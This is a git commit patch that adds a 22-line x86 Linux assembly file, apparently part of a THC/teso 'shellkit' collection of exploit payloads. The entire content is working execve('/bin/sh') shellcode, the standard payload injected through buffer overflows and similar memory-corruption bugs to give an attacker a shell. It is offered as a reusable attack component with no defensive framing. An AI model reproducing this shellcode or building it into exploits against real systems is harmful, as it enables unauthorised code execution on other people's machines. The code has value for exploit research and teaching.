From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/x86_linux/execve.s | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 other/shellkit/x86_linux/execve.s (limited to 'other/shellkit/x86_linux/execve.s') diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s new file mode 100644 index 0000000..2fdb69f --- /dev/null +++ b/other/shellkit/x86_linux/execve.s @@ -0,0 +1,22 @@ +/* x86/linux execve /bin/sh shellcode + * + * lorian / teso + */ + + .globl cbegin + .globl cend + +cbegin: + pushl $0x0b + popl %eax + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: -- cgit v1.3